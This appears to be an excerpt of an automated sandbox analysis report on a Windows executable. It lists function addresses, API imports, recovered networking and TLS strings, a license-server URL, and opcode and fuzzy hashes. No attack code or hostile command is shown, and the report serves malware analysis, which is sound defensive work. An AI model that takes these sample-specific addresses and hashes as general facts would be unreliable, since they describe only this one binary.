                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: __p___argc__p___argv__scrt_release_startup_lock_cexit_exit_get_initial_narrow_environment_register_thread_local_exe_atexit_callback
                                            • String ID:
                                            • API String ID: 1328870896-0
                                            • Opcode ID: a47a634a3720dd5e8eb68d9e5f74ccc3e60940e6258ac4f028983f2e83e52973
                                            • Instruction ID: 09d683f1a0f185324618a537cdc4cfed889cde41bca1cc34c5b287bd7a5b036f
                                            • Opcode Fuzzy Hash: a47a634a3720dd5e8eb68d9e5f74ccc3e60940e6258ac4f028983f2e83e52973
                                            • Instruction Fuzzy Hash: 26313011B1814A82FA54BB649471BBD9B91AF45F88FC40037DA4DCB2D7EE3DA8448232
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: free
                                            • String ID: %s$Connection #%ld to host %s left intact
                                            • API String ID: 1294909896-118628944
                                            • Opcode ID: 25ab57a35ded7b4366cd3229136faa6fbebb1ef31794a7cbe106c78bf5a5e3d9
                                            • Instruction ID: 00dafcc1e5ecf70a026e8bf2e5c4a9f9520c16421586cf7b8ebb6a6488ba153c
                                            • Opcode Fuzzy Hash: 25ab57a35ded7b4366cd3229136faa6fbebb1ef31794a7cbe106c78bf5a5e3d9
                                            • Instruction Fuzzy Hash: AA916132B1878992EB58AB25D5607F9A7A0EF45F84F840536DA4E87295CF38E4708361
                                            APIs
                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7E5A011BB
                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7E5A011D1
                                              • Part of subcall function 00007FF7E5A00F70: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF7E5A015F5), ref: 00007FF7E5A00FED
                                              • Part of subcall function 00007FF7E5A00F70: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF7E5A015F5), ref: 00007FF7E5A0100A
                                              • Part of subcall function 00007FF7E5A00F70: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF7E5A015F5), ref: 00007FF7E5A0101E
                                              • Part of subcall function 00007FF7E5A00F70: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF7E5A015F5), ref: 00007FF7E5A0103A
                                              • Part of subcall function 00007FF7E5A00F70: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF7E5A015F5), ref: 00007FF7E5A01057
                                              • Part of subcall function 00007FF7E5A00F70: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF7E5A015F5), ref: 00007FF7E5A0107A
                                              • Part of subcall function 00007FF7E5A00F70: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF7E5A015F5), ref: 00007FF7E5A0108E
                                              • Part of subcall function 00007FF7E5A00F70: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF7E5A015F5), ref: 00007FF7E5A010A2
                                              • Part of subcall function 00007FF7E5A00F70: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF7E5A015F5), ref: 00007FF7E5A010C8
                                              • Part of subcall function 00007FF7E5A00F70: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF7E5A015F5), ref: 00007FF7E5A010DC
                                              • Part of subcall function 00007FF7E5A00F70: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF7E5A015F5), ref: 00007FF7E5A010F0
                                              • Part of subcall function 00007FF7E5A00F70: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF7E5A015F5), ref: 00007FF7E5A0113F
                                              • Part of subcall function 00007FF7E5A00F70: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF7E5A015F5), ref: 00007FF7E5A0114C
                                              • Part of subcall function 00007FF7E5A00F70: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF7E5A015F5), ref: 00007FF7E5A01175
                                            • memset.VCRUNTIME140 ref: 00007FF7E5A01205
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: free$memset
                                            • String ID: Connected to %s (%s) port %ld (#%ld)$User-Agent: %s
                                            • API String ID: 2717317152-3248832348
                                            • Opcode ID: b4bb99099c09c2f90696dadfa9133446c6bcfceade5dd8e952d596f6c22118ac
                                            • Instruction ID: 84e43abc3b4fe76745d28e13f372e91bb9d9e1569f8901a035e5af429e1f98a5
                                            • Opcode Fuzzy Hash: b4bb99099c09c2f90696dadfa9133446c6bcfceade5dd8e952d596f6c22118ac
                                            • Instruction Fuzzy Hash: 53718062A18BCA81E751EF3594607FDAB51EF85F88F880132DB5D8B685DF38E4418362
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: free$memcpy
                                            • String ID: 1.1
                                            • API String ID: 4107583993-2150719395
                                            • Opcode ID: 8ee6e2ac4f1f044f33e62cc652399c1e933622224b859357fc7780ca18183277
                                            • Instruction ID: 24f6db731784fec9542d2e6ffe2c64cdbbe4271460851dff4279f2169b93cc50
                                            • Opcode Fuzzy Hash: 8ee6e2ac4f1f044f33e62cc652399c1e933622224b859357fc7780ca18183277
                                            • Instruction Fuzzy Hash: 755181B2704B8986D664AF22E5507AABBA0FB44F84F844032CF9E87754CF3CE595C711
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: ErrorLastmallocrecvsend
                                            • String ID: Send failure: %s
                                            • API String ID: 25851408-857917747
                                            • Opcode ID: a6506a0d2cd2bf56def8e955f094f9f147e258e37c492eb6729e9695d4306e10
                                            • Instruction ID: 159f2cf5a5258e70a8cf837e87834a3386d3db536be6bf6fa944c67cb1344b77
                                            • Opcode Fuzzy Hash: a6506a0d2cd2bf56def8e955f094f9f147e258e37c492eb6729e9695d4306e10
                                            • Instruction Fuzzy Hash: F341AF22715B8945EB60AF25A860B7AAA91EF08FACF944136CE6D87384DF3CD440C721
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: free
                                            • String ID: Resolving timed out after %I64d milliseconds
                                            • API String ID: 1294909896-3343404259
                                            • Opcode ID: 064f49bb6e255ade0c927bea9155e5f26801896246ecfeb9cc64ea89652f1773
                                            • Instruction ID: 9b3248f1b53262d36789b44c72cb4e7157755a7c832fc26b6445c37039f1b18f
                                            • Opcode Fuzzy Hash: 064f49bb6e255ade0c927bea9155e5f26801896246ecfeb9cc64ea89652f1773
                                            • Instruction Fuzzy Hash: B7D19F21A0864A85FB54AF2594643FCA3A1EF44F88F884537CE0E97699DF3CE465C372
                                            APIs
                                              • Part of subcall function 00007FF7E59E2840: system.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7E59E28A7
                                              • Part of subcall function 00007FF7E59E2840: system.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7E59E2917
                                              • Part of subcall function 00007FF7E59E2840: system.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7E59E2977
                                              • Part of subcall function 00007FF7E59E2840: system.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7E59E29C7
                                              • Part of subcall function 00007FF7E59E2840: system.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7E59E2A17
                                            • MessageBoxA.USER32 ref: 00007FF7E59E3727
                                              • Part of subcall function 00007FF7E59E4310: memcpy.VCRUNTIME140(7FFFFFFFFFFFFFFF,https://keyauth.win/api/1.2/,-3333333333333333,00007FF7E59E1B49), ref: 00007FF7E59E4341
                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7E59E378A
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: system$Message_invalid_parameter_noinfo_noreturnmemcpy
                                            • String ID: keyauth.win$null
                                            • API String ID: 3545939226-2841560827
                                            • Opcode ID: a149f5d0346e2e4d48248f0c08c14f7f6b43faf1cd1bb1cce2e8f79fdbdf0108
                                            • Instruction ID: 95474b78448ff0da18170c557a6496a7495ea7bf7ec702688ab905faec3d28be
                                            • Opcode Fuzzy Hash: a149f5d0346e2e4d48248f0c08c14f7f6b43faf1cd1bb1cce2e8f79fdbdf0108
                                            • Instruction Fuzzy Hash: E051C022B18B5985FB04EB75D4253EC67A1BB44F88F804136CE4D97B96DF3CA1928362
                                            APIs
                                              • Part of subcall function 00007FF7E5A08660: GetModuleHandleA.KERNEL32(?,?,?,00007FF7E5A324BA,?,?,?,?,00007FF7E5A089EB), ref: 00007FF7E5A08674
                                            • GetProcAddressForCaller.KERNELBASE(?,?,?,?,00007FF7E5A089EB), ref: 00007FF7E5A324D0
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: AddressCallerHandleModuleProc
                                            • String ID: InitSecurityInterfaceA$secur32.dll$security.dll
                                            • API String ID: 2084706301-3788156360
                                            • Opcode ID: f8e17ba8d6c6c72759de793df64b220ff247381932ecd5de2460a51393658e6d
                                            • Instruction ID: 3be0b88e341e74ef3f951ad1843a76982e52ac5492e5b43def9720cd814d7f9f
                                            • Opcode Fuzzy Hash: f8e17ba8d6c6c72759de793df64b220ff247381932ecd5de2460a51393658e6d
                                            • Instruction Fuzzy Hash: 9CF06960F1AA0B80FE14B725A8B1F749E91AF54F48FC40436C50CD2690EE3CE1888322
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Resolving timed out after %I64d milliseconds
                                            • API String ID: 0-3343404259
                                            • Opcode ID: f84caca69c7972fb98c0df09d891486e401f7fb6e43fed5d7a8f50e34cea5287
                                            • Instruction ID: 19e3d1bec650dd3e5ad564b1172d03cbe4162df466605f9a70e56c352aa0c58d
                                            • Opcode Fuzzy Hash: f84caca69c7972fb98c0df09d891486e401f7fb6e43fed5d7a8f50e34cea5287
                                            • Instruction Fuzzy Hash: 17B19221A0864A85FB64AF2594743FCA3A1EF41F88F940537CA1E87299DF3DE564C372
                                            APIs
                                            • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7E5A113D0
                                              • Part of subcall function 00007FF7E5A11960: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7E5A119BA
                                              • Part of subcall function 00007FF7E5A11710: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7E5A117A8
                                              • Part of subcall function 00007FF7E5A11710: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7E5A117B1
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: free$calloc
                                            • String ID: PROXY %s %s %s %li %li$TCP4$TCP6
                                            • API String ID: 3095843317-1242256665
                                            • Opcode ID: 96fa687422f9b566cd94733f51a11b0d903c0c44d5a23cdfef28e96cef9fcfef
                                            • Instruction ID: 56799a9a099ebd5ef35be17dea7593a8a343bc378f0e54e79002b54ab750e85d
                                            • Opcode Fuzzy Hash: 96fa687422f9b566cd94733f51a11b0d903c0c44d5a23cdfef28e96cef9fcfef
                                            • Instruction Fuzzy Hash: 0741DEB1B0C68A85E750EB21A560BB9BFA1AF45F88F944033DB4DC7685DE3CD804C722
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: closesocket$calloc
                                            • String ID:
                                            • API String ID: 2958813939-0
                                            • Opcode ID: bc6efae724a25be5cf336922f8a5526ea3aa4747548e4227bf4d0a77b276633a
                                            • Instruction ID: 2f26668202ab365f25afda52871c32dbfa9c2c025fa38c34975004b533d62eac
                                            • Opcode Fuzzy Hash: bc6efae724a25be5cf336922f8a5526ea3aa4747548e4227bf4d0a77b276633a
                                            • Instruction Fuzzy Hash: FA413D32B1864A81E740AB35D4603F9A761FF88B58F944232DE5EC62D6EF38D5558332
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: SSL/TLS connection timeout$select/poll on SSL/TLS socket, errno: %d
                                            • API String ID: 0-3791222319
                                            • Opcode ID: a38cc91fe961a61f807d027dd041507603a95d00c7f28230958b43a3fdfda65b
                                            • Instruction ID: 2878be80828a0e42dac253e68f0f9aa6a6ef8d326fb0a86a39a2e5bf926eda7d
                                            • Opcode Fuzzy Hash: a38cc91fe961a61f807d027dd041507603a95d00c7f28230958b43a3fdfda65b
                                            • Instruction Fuzzy Hash: 0F51AA61B0C64A8DEB64AB119760B79AA91EF44FE8F944232CA5DC72D1DF3CE441C722
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: freerecv
                                            • String ID:
                                            • API String ID: 2032557106-0
                                            • Opcode ID: c790e156fe5950b785f982986055669257d471f0900d9163bc54202700052627
                                            • Instruction ID: 51ca85f7c66e510aa83fd3a38cd805a2c40ff7f278724ee394c5dea67283fe90
                                            • Opcode Fuzzy Hash: c790e156fe5950b785f982986055669257d471f0900d9163bc54202700052627
                                            • Instruction Fuzzy Hash: 16C1E632B0878646EB259B25D4607FDA2A0FF44BA8F944236DE6E837C5DF3CE4518721
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: free
                                            • String ID: Connected to %s (%s) port %ld (#%ld)$User-Agent: %s
                                            • API String ID: 1294909896-3248832348
                                            • Opcode ID: 14735c8d4da5ff9c77df89ee8aaeda6f25f4d3af1a329b697456f181ecc354f3
                                            • Instruction ID: ca2075c1ffbd2627a81d3f5c2a96c867adfcddf15e604539aa002807492d37a4
                                            • Opcode Fuzzy Hash: 14735c8d4da5ff9c77df89ee8aaeda6f25f4d3af1a329b697456f181ecc354f3
                                            • Instruction Fuzzy Hash: 5A518F62A18BC581E7419F35D4607E9AB51EF84F9CF884132DB8D8B39ACF78D491C321
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: ErrorLastrecv
                                            • String ID:
                                            • API String ID: 2514157807-0
                                            • Opcode ID: 50b0f7eba990a790d6b453f32775dedec0c9d4c657e3ed14e7c64ed1cc5c7626
                                            • Instruction ID: 3a626de1a5290f89b678e6cf9211122705e9d19e009e430217ec472addb094fb
                                            • Opcode Fuzzy Hash: 50b0f7eba990a790d6b453f32775dedec0c9d4c657e3ed14e7c64ed1cc5c7626
                                            • Instruction Fuzzy Hash: 9DE0DF61F0450942FF2967B0E864B7815909F48B76F844735CA3BC63C0DA3C44D24322
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: closesocket
                                            • String ID:
                                            • API String ID: 2781271927-0
                                            • Opcode ID: 0acd8f144205fd7c07458067433ed9e513df544e46d7a056d5b47dc6e313ae86
                                            • Instruction ID: d781430fd3eb3f792fadd135d783cf10238ebcdc41d81eda7ddda95aa8bf1ac9
                                            • Opcode Fuzzy Hash: 0acd8f144205fd7c07458067433ed9e513df544e46d7a056d5b47dc6e313ae86
                                            • Instruction Fuzzy Hash: D001B921B1554581FF58EB7AE1687BDA790EF88F88F884032D70DC7295CF38D4A18722
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: socket
                                            • String ID:
                                            • API String ID: 98920635-0
                                            • Opcode ID: b0a6f7b45456ddbb6455febc33661ab65252148e8f2ff9fccaae510af289b50e
                                            • Instruction ID: 9cbe83a3a1f8c9784c7841f2b0e00ae16099ce729daa324db1a30d8371235b7a
                                            • Opcode Fuzzy Hash: b0a6f7b45456ddbb6455febc33661ab65252148e8f2ff9fccaae510af289b50e
                                            • Instruction Fuzzy Hash: 3DE0E535F0210982CE186731C4A167827506F50B38FC04372C63D472C0CE3CA156AB10
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: _beginthreadex
                                            • String ID:
                                            • API String ID: 3014514943-0
                                            • Opcode ID: 6fcec5ed8170132fa7d27f4e84d0996d8cab90decfbbc05c53f51dd08cce7cd9
                                            • Instruction ID: ee4f9163e884d83693234836f3e1e783d0fe8067e2198cd2e090fcdb1e396c9c
                                            • Opcode Fuzzy Hash: 6fcec5ed8170132fa7d27f4e84d0996d8cab90decfbbc05c53f51dd08cce7cd9
                                            • Instruction Fuzzy Hash: F3D02B63B18A04839F10DFB1A850029E751BB88774B884339EE7D827E0DB3CD1454600
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
